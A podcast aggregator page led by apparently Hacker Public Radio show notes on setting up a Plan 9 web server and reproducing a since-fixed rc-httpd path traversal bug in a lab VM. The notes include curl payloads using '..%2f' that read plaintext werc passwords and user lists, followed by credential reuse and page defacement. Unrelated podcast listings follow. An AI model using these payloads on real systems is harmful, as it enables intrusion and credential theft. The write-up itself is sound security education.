Hacker Public Radio

Play Episode Listen Later Sep 19, 2022


Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models Installing Plan 9 with libvirt [root@localhost]# virt-install -n 9pwn --description "pre-patched rc-httpd" --osinfo=unknown --memory=4096 --vcpus=4 --disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 --graphics spice --cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso --network bridge=virbr0 [root@localhost]# virt-viewer 9pwn How I find the IP of my guests and add it to my /etc/hosts for faster access. [root@localhost]# virsh domiflist 9pwn Interface Type Source Model MAC ---------------------------------------------------------- vnet3 bridge virbr0 e1000 52:54:00:43:8a:50 [root@localhost]# arp -e | grep 52:54:00:43:8a:50 192.168.122.20 ether 52:54:00:43:8a:50 C virbr0 [root@localhost]# echo cirno 192.168.122.20 >> /etc/hosts Proceed as normal with a 9 installation Set up CPU server with rc-httpd and werc I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it's fine) I've snarfed+pasted it here for the sake of completeness and modified it slightly so that it's more accessible for other people. I've also revised these notes so that they're less-broken. I may or may not update them. I'm using 9front for this. It has more secure authentication protocols when it comes to remotely connecting. Configuring a CPU server Add users to file server Connect to the file server and add a new user called who is in the groups sys, adm, and upas term% con -C /srv/cwfs.cmd newuser newuser sys + newuser adm + newuser upas + Reboot and set user= when prompted at boot time. Configure user's environment This is similar to cp -r /etc/skel /home/ on a UNIX system. /sys/lib/newuser Configure headless booting Mount the boot partition: term% 9fs 9fat edit the boot config, /n/9fat/plan9.ini bootfile=9pc64 nobootprompt=local!/dev/sdC0/fscache mouseport=ps2 monitor=vesa vgasize=1024x768x14 user= tiltscreen=none service=cpu Add hostowner info to nvram Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner. For automatic booting (aka not entering a password at the physical machine every time we power it in), we need to add the hostowner's key to nvram. term% nvram=/dev/sdF0/nvram auth/wrkey bad nvram des key bad authentication id bad authentication domain authid: authdom: cirno secstore key: password: Configure auth server In order to connect to the system over the network, the new user must be added to the auth server. term% auth/keyfs term% auth/changeuser Password: Confirm password: Assign new Inferno/POP secret? [y/n]: n Expiration date (YYYYMMDD or never) [never]: never Post id: User's full name: Department #: User's email address: Sponsor's email address: user installed for Plan 9 Configure permissions /lib/ndb/auth is similar to a /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (but sys and adm are more like groups but who cares). append to /lib/ndb/auth hostid= uid=!sys uid=!adm uid=* then reboot Test if it worked with drawterm The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won't work. $ /opt/drawterm -u -h example.com -a example.com -r ~/ Configure rc-httpd edit /rc/bin/rc-httpd/select-handler this file is something like /etc/httpd.conf on a UNIX system. #!/bin/rc PATH_INFO=$location switch($SERVER_NAME) { case example.com FS_ROOT=/sys/www/$SERVER_NAME exec static-or-index case * error 503 } To listen on port 80 and run the handler on port 80: cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80 cpu% chmod +x /rc/bin/rc-httpd/select-handler Reboot and test. SSL I will never give money to the CA racket. Self-signed is the way to go on systems that don't support acme.sh, the only ACME client I use for obtaining free SSL certs. Generate and install: cpu% ramfs -p cpu% cd /tmp cpu% auth/rsagen -t 'service=tls role=client owner=*' > key cpu% chmod 600 key cpu% cp key /sys/lib/tls/key cpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert cpu% mkdir /cfg/$sysname cpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart Now add a listener in /rc/bin/service/tcp443: #!/bin/rc exec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $* And make it executable: cpu% chmod +x /rc/bin/service/tcp443 Install and configure werc cpu% cd cpu% mkdir /sys/www && cd www cpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz > werc-1.5.0.tgz cpu% tar xzf werc-1.5.0.tgz cpu% mv werc-1.5.0 werc # ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK # EG. DIRDIR, BLAGH, ETC # DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK # HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK # PLEASE I BEG YOU cpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i cpu% cd werc/sites/ cpu% mkdir example.com cpu% mv default.cat-v.org example.com now re-edit /rc/bin/rc-httpd/select-handler #!/bin/rc WERC=/sys/www/werc PLAN9=/ PATH_INFO=$location switch($SERVER_NAME){ case cirno FS_ROOT=$WERC/sites/$SERVER_NAME exec static-or-cgi $WERC/bin/werc.rc case * error 503 } Test the website. Werc is fiddly. Werc is archaic. Werc is fun. Path traversal vulnerabilities in old versions of rc-httpd Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases. The vulnerability # get list of werc admin users [root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members pwn # get that werc user's password [root@localhost]# http://cirno/..%2f..%2f/etc/users/pwn/password supersecret Wait, the passwords for werc are stored in plain text? Let's log in [root@localhost]# firefox http://cirno/_users/login Now let's see if any of the werc users are also system users: # let's enumerate users [root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users -1:adm:adm:glenda,pwn 0:none:: 1:tor:tor: 2:glenda:glenda: 3:pwn:pwn: 10000:sys::glenda,pwn 10001:map:map: 10002:doc:: 10003:upas:upas:glenda,pwn 10004:font:: 10005:bootes:bootes: Let's hope that no one is re-using credentials. Let's check just to be sure $ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G cpu% cat /env/sysname cirno cpu% This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and share login/passwords How the static-or-cgi handler works rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script. I will compile these archaic rc scripts into pseudo code for the listener. The static-or-cgi handler (the handler specified in the httpd config) is simple: #!/bin/rc cgiargs=$* fn error{ if(~ $1 404) exec cgi $cgiargs if not $rc_httpd_dir/handlers/error $1 } if(~ $location */) exec cgi $cgiargs if not exec serve-static If the requested file exists, call the cgi handler and pass it arguments. If the requested file does not exist, call the serve-static handler. How the serve-static handler works The problem lies in the serve-static handler: #!/bin/rc full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d} full_path=$"full_path if(~ $full_path */) error 503 if(test -d $full_path){ redirect perm $"location^'/' 'URL not quite right, and browser did not accept redirect.' exit } if(! test -e $full_path){ error 404 exit } if(! test -r $full_path){ error 503 exit } do_log 200 switch($full_path){ case *.html *.htm type=text/html case *.css type=text/css case *.txt *.md type=text/plain case *.jpg *.jpeg type=image/jpeg case *.gif type=image/gif case *.png type=image/png case * type=`{file -m $full_path} } if(~ $type text/*) type=$type^'; charset=utf-8' max_age=3600 # 1 hour echo 'HTTP/1.1 200 OK'^$cr emit_extra_headers echo 'Content-type: '^$type^$cr echo 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr echo 'Cache-control: max-age='^$max_age^$cr echo $cr exec cat $full_path encode the full file path into a url if the url points to a file outside of '*/', the document root, error 503 if the url is broken, exit if the url points to a file that neither exists nor is readable, error 503 if you haven't exited by now, serve the file The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING. The urlencode command works by decoding encoded characters. cpu% echo 'http://cirno/..%2f' | urlencode -d http://cirno/../ Does ../ exist in */ ? the answer is yes. .. is a directory contained inside of */ */../ is the current working directory. How they fixed it Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided. Other (optional) bad config options in werc rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability. Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd to write to disk. rc-httpd runs as the none user so it's not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it's the worst idea in the history of all time ever. I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that's what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser. Let's pretend that I'm not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled. # get config [root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config masterSite=cirno siteTitle='Werc Test Suite' conf_enable_wiki wiki_editor_groups admin Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let's modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability. [root@localhost]# curl -s cirno | pandoc --from html --to plain quotes | docs | repo | golang | sam | man | acme | Glenda | 9times | harmful | 9P | cat-v.org Related sites: | site updates | site map | Werc Test Suite - › apps/ - › titles/ SECURITY ADVISORY: lol this guy still hasn't figured out the ..%2f trick Powered by werc Modifying werc to support password hashing Adding password hashes isn't too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc % echo 'supersecret' | sha1sum -2 512 Private namespaces to the rescue Luckily enough, the webserver runs as the none user with it's own namespace. Comparing the hostowner's namespace and none user's namespace I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences. cpu% ns | sort > cpu.ns cpu% ps -a | grep -e 'listen.*80' | grep -v grep none 355 0:00 0:00 132K Open listen [/net/tcp/2 tcp!*!80] cpu% ns 355 | sort > listen.ns cpu% diff -u listen.ns cpu.ns --- listen.ns +++ cpu.ns @@ -6,17 +6,29 @@ bind /amd64/bin /bin bind /mnt /mnt bind /mnt/exportfs /mnt/exportfs +bind /mnt/temp/factotum /mnt/factotum bind /n /n bind /net /net bind /root /root +bind -a '#$' /dev bind -a '#I' /net +bind -a '#P' /dev +bind -a '#S' /dev bind -a '#l' /net +bind -a '#r' /dev +bind -a '#t' /dev +bind -a '#u' /dev +bind -a '#u' /dev bind -a '#¤' /dev bind -a '#¶' /dev +bind -a '#σ/usb' /dev +bind -a '#σ/usbnet' /net bind -a /rc/bin /bin bind -a /root / +bind -b '#k' /dev bind -c '#e' /env bind -c '#s' /srv +bind -c /usr/pwn/tmp /tmp cd /usr/pwn mount -C '#s/boot' /n/other other mount -a '#s/boot' / @@ -26,4 +38,4 @@ mount -a '#s/slashmnt' /mnt mount -a '#s/slashn' /n mount -aC '#s/boot' /root -mount -b '#s/factotum' /mnt +mount -b '#s/cons' /dev The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace: '#$' PCI interfaces '#P' APM power management '#S' storage devices '#r' realtime clock and nvram '#t' serial ports '#u' USB '#σ' /shr global mountpoints '#k' keyboard /tmp directories '#s' various special files relating to services The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none. Closing An argument could be maid that the rc-httpd vulnerability was "not a bug" because "namespaces are supposed to segregate the system". I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system. For example, when I write PHP applications, I consider things in this order: don't pass unnecessary resources into the document root via symlinks, bind mounts, etc. never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements. fire up a kali linux vm and beat the test server half to death iterate upon my ignorance doubly verify DAC just to be sure re-check daemon configs to make sure I'm not doing anything stupid FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don't make it possible to enumerate users, rate limiters, etc. Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks. Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You'll be surprised when even MAC doesn't protect your system. Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system? Plan 9 is perfect for this type of research. I'm considering writing an httpd in C and a werc-like (minus the parts I don't like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape. I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad. And my final thought: Criticism: This program/OS/whatever sucks Response: I know, help me fix it.

Astro arXiv | all categories
Optimisation of the WEAVE target assignment algorithm

Astro arXiv | all categories

Play Episode Listen Later Sep 5, 2022 0:29


Optimisation of the WEAVE target assignment algorithm by Sarah Hughes et al. on Monday 05 September WEAVE is the new wide-field spectroscopic facility for the prime focus of the William Herschel Telescope in La Palma, Spain. Its fibre positioner is essential for the accurate placement of the spectrograph's ~960-fibre multiplex. To maximise the assignment of its optical fibres, WEAVE uses a simulated annealing algorithm called Configure, which allocates the fibres to targets in the field of view. We have conducted an analysis of the algorithm's behaviour using a subset of mid-tier WEAVE-LOFAR fields, and adjusted the priority assignment algorithm to optimise the total fibres assigned per field, and the assignment of fibres to the higher priority science targets. The output distributions have been examined, to investigate the implications for the WEAVE science teams. arXiv: http://arxiv.org/abs/http://arxiv.org/abs/2209.01145v1

Ctrl+Alt+Azure
149 - Developing in the cloud with Microsoft Dev Box

Ctrl+Alt+Azure

Play Episode Listen Later Aug 31, 2022 35:44


(00:00) - Intro and catching up.(03:09) - Show content starts.Show links- Configure the Dev Box service (Microsoft Docs)- Dev Box pricing (Microsoft Azure)- Markus Lintuala's tweet on the passwordless update (Twitter)SPONSORThis episode is sponsored by Sovelto.We at Sovelto support your personal growth, keep your Azure skills up to date and increase your market value. Learn or expire: sovelto.fi/pro 

Stefanos Cloud Podcast (stefanos.cloud)
How to configure Microsoft 365 settings in the admin center portal

Stefanos Cloud Podcast (stefanos.cloud)

Play Episode Listen Later Aug 22, 2022 23:16


In this how-to article, we will show you how to configure Microsoft 365 settings in the admin center portal. These settings include domains, search and intelligence, org settings, integrated apps and partner relationships. --- Send in a voice message: https://anchor.fm/stefanoscloud/message

RetroRGB Weekly Roundup
Supporter Q&A #219

RetroRGB Weekly Roundup

Play Episode Listen Later Aug 5, 2022 53:34


Here's the Supporter Q&A from August 4th, 2022. All comments and questions are fielded through the support service Q&A page. Please consider supporting this channel via monthly services, tips, or even just by using our affiliate links to purchase things you were already going to buy anyway, at no extra cost to you: https://www.retrorgb.com/support.html View this as a video: https://www.youtube.com/retrorgb Amazon Links to products I use: https://www.amazon.com/shop/retrorgb T-Shirts & Stuff: https://www.retrorgb.com/store.html TIMESTAMPS (please assume all links are affiliate links): 00:00 Welcome! 00:17 Getting audio from TV's via ARC 05:46 Raspberry Pi hat in 480i for TV & Movies? https://www.recalbox.com/ 07:36 Mixing switches in a retro matrix setup 15:04 HDMI matrix with VRR & 4K 120? 19:14 Splitting MiSTer RGB Output for arcade cabs: https://twitter.com/dojooculto/status/1553413151596503041 22:29 My thoughts on repro's 26:04 Why no dedicated RF to composite boxes? 28:55 3DO Suggestions: ODE: https://www.retrorgb.com/external-3do-odes-available-for-pre-order.html RGB Kit: https://www.retrorgb.com/3do-rgb-in-stock-at-retrogamerstuff-com.html 32:16 PS3 - SSD or HDD? 34:09 Latency testing discrepancy 37:34 Cloud sync gamesaves 40:37 Configure a GC to sell 43:50 Video card for VGA monitors / a BFI box? 47:13 Missing question? 47:34 WTF happened to my ceiling??? --- Support this podcast: https://anchor.fm/retrorgb/support

SugarU Podcast
Season 2 Episode 15: Sugar Customer Self-Service Portal

SugarU Podcast

Play Episode Listen Later Aug 2, 2022 8:23


Show Notes: In this episode, we discuss how the self-service customer portal is just a part of the solution for your customer experience. We talk about what self-service means to your customer and you and how it can be configured to best meet your ideal customer experience. Sugar Serve Demo (with self-service portal) Quick Video: How to Configure the Self-Service Customer Portal

Mully & Haugh Show on 670 The Score
Brad Biggs on how Bears will configure offensive line

Mully & Haugh Show on 670 The Score

Play Episode Listen Later Jul 28, 2022 16:01


Mike Mulligan and David Haugh were joined by Brad Biggs of the Tribune to discuss the latest Bears storylines as they held their first practice of training camp. How will the Bears configure their offensive line after the additions of Michael Schofield and Riley Reiff?

XenTegra - Nutanix Weekly
Nutanix Weekly: Convert Your Cluster to AHV and Configure Leap for Disaster Recovery

XenTegra - Nutanix Weekly

Play Episode Listen Later Jul 13, 2022 34:19 Transcription Available


On my previous blog (Link) I showed you how to build a metro availability. Now I want to "upgrade" both clusters to AHV and enable data protection with the help of Leap to achieve an RPO of zero (0).This blog post are two posts combined. First is the in-place conversion of ESX to AHV and the second is how to enable and configure Leap.Host: Harvey GreenCo-host: Jirah CoxCo-host: Ben Rogers

The Swyx Mixtape
Time Management: Capture, Configure, Control [Cal Newport]

The Swyx Mixtape

Play Episode Listen Later Jul 12, 2022 23:11


Listen to Deep Questions: https://www.listennotes.com/podcasts/deep-questions/ep-169-how-do-i-manage-my-time-gTNFVbZvLQA/ Three requirements of time management Capture: don't store anything in your head. Your ideas, info, commitments, plans. Configure: make effort organizing. Gather relevant info in one place. Control: proactively make a plan for your time in advance: quarterly, weekly, daily Constrain (bonus!): figure out how to automate, consolidate interruptions with office hours Actual tools used Capture workingmemory.txt shutdown: -> go thru workingmemory -> trello, gdoc Configure separate kanban board for every role - researcher, etc  columns "to be processed" "waiting to hear back from" "persistent initiatives" daily: just add stuff weekly: reorganize and review Controldaily, weekly, quarterly, time blocking

BSD Now
462: OpenBSD Sales Pitch

BSD Now

Play Episode Listen Later Jul 7, 2022 53:49 Very Popular


The Design and Implementation of the NetBSD rc.d system, selling OpenBSD as a salesperson, Speeding up autoconf with caching, Allowing non-root execution of a jailed application, Configure login(1) and sshd(8) for YubiKey on OpenBSD, and more. NOTES This episode of BSDNow is brought to you by Tarsnap (https://www.tarsnap.com/bsdnow) and the BSDNow Patreon (https://www.patreon.com/bsdnow) Headlines The Design and Implementation of the NetBSD rc.d system (http://www.mewburn.net/luke/papers/rc.d.pdf) How I would sell OpenBSD as a salesperson (https://dataswamp.org/~solene/2022-06-22-openbsd-selling-arguments.html) News Roundup Speeding up autoconf with caching (https://jmmv.dev/2022/06/autoconf-caching.html) Allowing non-root execution of a jailed application (https://forums.freebsd.org/threads/allowing-non-root-execution-of-a-jailed-application.85532/) Configure login(1) and sshd(8) for YubiKey on OpenBSD (https://romanzolotarev.com/openbsd/yubikey.html) Tarsnap This weeks episode of BSDNow was sponsored by our friends at Tarsnap, the only secure online backup you can trust your data to. Even paranoids need backups. Feedback/Questions Glen - Thanks Todd (https://github.com/BSDNow/bsdnow.tv/blob/master/episodes/462/feedback/Glen%20-%20Thanks%20Todd.md) Karl - Memory Question (https://github.com/BSDNow/bsdnow.tv/blob/master/episodes/462/feedback/Karl%20-%20Memory%20Question.md) alejandro - Tom's laptop (https://github.com/BSDNow/bsdnow.tv/blob/master/episodes/462/feedback/alejandro%20-%20Tom's%20laptop.md) Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv (mailto:feedback@bsdnow.tv) ***

XenTegra - IGEL Weekly
IGEL Weekly: How to Configure Zoom Virtual Backgrounds on IGEL OS

XenTegra - IGEL Weekly

Play Episode Listen Later Jun 22, 2022 37:48 Transcription Available


Recently, in the IGEL Community, Lars Glöckner, Senior Solutions Architect EMEA at IGEL, posted a tech-tip on configuring Zoom virtual backgrounds on IGEL OS.Make Zoom Virtual Background on Linux available with Citrix, VMware Horizon, and AVD (WVD) when you don't have the supported hardware in place.Host: Andy WhitesideCo-host: Patrick TonerCo-host: Chris Feeney

Mully & Haugh Show on 670 The Score
Ozzie Guillen shares how White Sox should configure bullpen with Liam Hendriks out (Hour 3)

Mully & Haugh Show on 670 The Score

Play Episode Listen Later Jun 15, 2022 36:25


In the third hour, David Haugh was joined by NBC Sports Chicago analyst Ozzie Guillen to discuss the latest White Sox storylines, including closer Liam Hendriks landing on the injured list. Who should get the ball in the ninth inning now? Later, BetQL Daily host Joe Ostrowski joined the show to discuss the latest sports gambling storylines.

CLARITY.SHOW Quote-to-Cash Podcast
Recent Innovations in Configure, Price, Quote | CLARITY.SHOW - Quote-to-Cash Podcast Nr3

CLARITY.SHOW Quote-to-Cash Podcast

Play Episode Listen Later Jun 8, 2022 31:09


Next-generation of Configure, Price, Quote systems - how trends that we see on the market today are affecting CPQ systems development and increasing CPQ value for business and customers. Our guest: Chris Weckler, Solutions Director at SAP. ► Subscribe to CLARITY Quote-to-Cash Podcast Channel here: https://www.youtube.com/channel/UCjnDGDhYKhedl2lVIv6QRkQ Follow Us Here: Website: https://www.clarity.cx/clarity-show LinkedIn: https://www.linkedin.com/company/claritygroup

Google Cloud Platform Podcast
GKE Release Channels with Kobi Magnezi and Abdelfettah Sghiouar

Google Cloud Platform Podcast

Play Episode Listen Later May 25, 2022 47:56


Kaslin Fields and Mark Mirchandani learn how GKE manages their releases and how customers can take advantage of the GKE release channels for smooth transitions. Guests Abdelfettah Sghiouar and Kobi Magnezi of the Google Cloud GKE team are here to explain. With releases every four months or so, Kobi tells us that Kubernetes requires two pieces to be managed with each release: the control plane and the nodes. Both are managed for the customer in GKE. The new addition of release channels allows flexibility with release updating so customers can adjust to their specific project needs. Each channel offers a different updating mix and speed, and clients choose the channel that's right for their project. The idea for release channels isn't a new one, Kobi explains. In fact, Google's frequent project releases, while keeping things secure and running well, also can be customized by choosing from an assortment of channels in other Google offerings like Chrome. Our guests talk us through the process of releasing through channels and how each release marinates in the Rapid channel to be sure the version is supported and secure before being pushed to customers through other channels. We hear how release channels differ from no-channel releases, the benefits of specialized channels, and recommendations for customers as far as which channels to use with different development environments. Abdel describes real-world use cases for the Rapid, Regular, and Stable channels, the Surge Upgrade feature, and how GKE notifications with Pub/Sub helps in the updating process. Kobi talks about maintenance and exclusion windows to help customers further customize when and how their projects will update. Kobi and Abdel wrap up with a discussion of the future of GKE release channels. Kobi Magnezi Kobi is the Product Manager for GKE at Google Cloud. Abdelfettah Sghiouar Abdel is a Cloud Dev Advocate with a focus on Cloud native, GKE, and Service Mesh technologies. Cool things of the week GKE Essentials videos KubeCon EU 2023 site KubeCon Call for Proposals site Kubernetes 1.24: Stargazer site GCP Podcast Episode 292: Pulumi and Kubernetes Releases with Kat Cosgrove podcast Optimize and scale your startup on Google Cloud: Introducing the Build Series blog Interview Kubernetes site GKE site Autoscaling with GKE: Overview and pods video GKE release schedule dcos Release channels docs Upgrade-scope maintenance windows docs Configure cluster notifications for third-party services docs Cluster notifications docs Pub/Sub site Agones site What's something cool you're working on? Kaslin is working on KubeCon and new episodes of GKE Essentials. Hosts Mark Mirchandani and Kaslin Fields

Azure Friday (HD) - Channel 9
Azure SQL Database: An introduction to temporal tables

Azure Friday (HD) - Channel 9

Play Episode Listen Later May 20, 2022


If you are familiar with the Event Sourcing and CQRS patterns, then you know that they are extremely powerful, but can be quite complex to implement correctly. Davide Mauri joins Lara Rubbelke to show temporal tables give you the same benefits without the related challenges. Chapters 00:00 - Introduction 01:28 - Demo using temporal tables 06:11 - Demo using 'as of' 07:36 - Demo for a range of time 08:32 - Wrap-up Recommended resources Getting started with temporal tables Configure temporal retention policy Azure SQL Database Create a Pay-as-You-Go account (Azure) Create a free account (Azure) Connect Twitter: Lara Rubbelke | @SQLGal Twitter: Davide Mauri | @MauriDB Twitter: Azure Friday | @AzureFriday

Azure Friday (Audio) - Channel 9
Azure SQL Database: An introduction to temporal tables

Azure Friday (Audio) - Channel 9

Play Episode Listen Later May 20, 2022


If you are familiar with the Event Sourcing and CQRS patterns, then you know that they are extremely powerful, but can be quite complex to implement correctly. Davide Mauri joins Lara Rubbelke to show temporal tables give you the same benefits without the related challenges. Chapters 00:00 - Introduction 01:28 - Demo using temporal tables 06:11 - Demo using 'as of' 07:36 - Demo for a range of time 08:32 - Wrap-up Recommended resources Getting started with temporal tables Configure temporal retention policy Azure SQL Database Create a Pay-as-You-Go account (Azure) Create a free account (Azure) Connect Twitter: Lara Rubbelke | @SQLGal Twitter: Davide Mauri | @MauriDB Twitter: Azure Friday | @AzureFriday

Craig Peterson's Tech Talk
Facebook Has No Idea Where Your Data Is and What They Do With It?!

Craig Peterson's Tech Talk

Play Episode Listen Later May 13, 2022 82:20


Facebook Has No Idea Where Your Data Is and What They Do With It?! Facebook's about 18 years old coming on 20 Facebook has a lot of data. How much stuff have you given Facebook? Did you fall victim for that? Hey, upload your contacts. We'll find your friends. They don't know where your data is. [Following is an automated transcript] [00:00:15] This whole thing with Facebook has exploded here lately. [00:00:20] There is an article that had appeared on a line from our friends over at, I think it was, yeah. Let me see here. Yeah. Yeah. Motherboard. I was right. And motherboards reporting that Facebook doesn't know what it does with your data or. It goes, no, there's always a lot of rumors about different companies and particularly when they're big company and the news headlines are grabbing your attention and certainly Facebook can be one of those companies. [00:00:57] So where did motherboard get this opinion about Facebook? Just being completely clueless about your personal. It tamed from a leaked document. Yeah, exactly. So we find out a lot of stuff like that. I used to follow a website about companies that were going to go under and they posted internal memos. [00:01:23] It basically got sued out of existence, but there's no way that Facebook is going to be able to Sue this one out of existence because they are describing this as. Internally as a tsunami of privacy regulations all over the world. So Gores, if you're older, we used to call those tidal waves, but think of what the implication there is of a tsunami coming in and just overwhelming everything. [00:01:53] So Facebook, internally, their engineers are trying to figure out, okay. So how do we deal with. People's personal data. It's not categorized in ways that regulators want to control it. Now there's a huge problem right there. You've got third party data. You've got first party data. You've got sensitive categories, data. [00:02:16] They might know what religion you are, what your persuasions are in various different ways. There's a lot of things they might know about you. How were they all cat categorize now we've got the European union. With their general data protection regulation. The GDPR we talked about when it came into effect back in 2018, and I've helped a few companies to comply with that. [00:02:41] That's not my specialty. My specialty is the cybersecurity. But in article five this year, peon law mandates that personal data must be collected for specified explicit and legitimate purposes and not further processed in a manner that is incompatible with those purposes. So what that means is that every piece of data, like where you are using Facebook or your religious orientation, Can only be collected in use for a specific purpose and not reused for another purpose. [00:03:19] As an example here, that vice has given in past Facebook, took the phone number that users provided to protect their accounts with two factor authentication and fed it to its people, feature as well as. Advertisers. Yeah. Interesting. Hey, so Gizmodo with the help of academic researchers caught Facebook doing this, and eventually the company had to stop the practice because, and this goes back to the earlier days where Facebook would say, Hey, find out if your friends are on Facebook, upload your contacts right now. [00:03:54] And most people. What did you know back then about trying to keep your data private, to try and stop the proliferation of information about you online then nothing. I think I probably even uploaded it back then thinking it'd be nice to see if I got friends here. We can start chatting, et cetera. [00:04:12] According to legal experts that were interviewed by motherboard who wrote this article and has a copy of the internal memo this year, PN regulation specifically prohibits that kind of repurposing of your phone number of trying to put together the social graph and the leaked document shows that Facebook may not even have the ability to live. [00:04:37] How it handles user's data. Now I was on a number of radio stations this week, talking about this. And the example I gave is just look at an average business from the time it start, Facebook started how right? Wildly scraping pictures of young women off of Harvard university. Main catalog, contact page, and then asking people what do you think of this? This person, that person. And off they go, trying to rate them. Yeah. Yeah. All that matters to a woman, at least to Courtney, to mark Zuckerberg girl, all the matters about a woman is how she looks. Do I think she's pretty or not? [00:05:15] It's ridiculous. What he was doing. It just, oh, that's zackerburg who he is not a great guy anyways. So you go from stealing pictures of young ladies asking people to rate them, putting together some class information and stuff there at Harvard, and then moving on to other universities and then open it up even wider and wider. [00:05:42] And of course, that also created demand because you can't get on. If you're not at one of the universities that we have set it up for. And then you continue to grow. You're adding these universities, certainly starting to collect data and you are making more money than God. So what do you do? You don't have to worry about any efficiencies. [00:06:02] I'll tell you that. Right? One thing you don't have to do is worry about gee. We've got a lot of redundant work going on here. We've got a lot of teams working on basically the same thing. No, you've got more money than you can possibly shake a stick at. So now you go ahead and send that money to this group or that group. [00:06:24] And they put together all of the basic information, that they want. Pulling it out of this database and that database in there doing some correlation, writing some really cool CQL queries with mem credible joins and everything else. And now that becomes part of the main code for Facebook. [00:06:45] And then Facebook goes on to the next little project and they do the same thing. Then the next project, then the next project. And then someone comes along and says, Hey, we. This feature, that feature for advertisers and then in that goes, and then along comes candidate Obama. And they, one of the groups inside Facebook says, yeah here we go. [00:07:09] Here's all of the information we have about everybody and it's free. Don't worry about it. And then when Trump actually bought it and hired a company to try and process some of that information he got in trouble. No but the. The whole campaign could get access to anything they wanted to, again, because the data wasn't controlled, they had no idea who was doing what with the data. [00:07:34] And according to this internal memo, they still don't know. They don't even know if they can possibly comply with these regulations, not just in Europe, but we have regulations in pretty much all of the 50 states in the U S Canada of course, has their own Australia and New Zealand think about all the places. [00:07:57] Facebook makes a lot of. So here's a quote from that we build systems with open borders. The result of these open systems and open culture is well-described with an analogy. Imagine you hold a bottle of ink in your hand, the bottle of ink is a mixture of all kinds of user data. You pour that ink into a lake of water and K and it flows every year. [00:08:22] The document read. So how do you put that ink back in the bottle? I, in the right bottle, how do you organize it again? So that it only flows to the allowed places in the 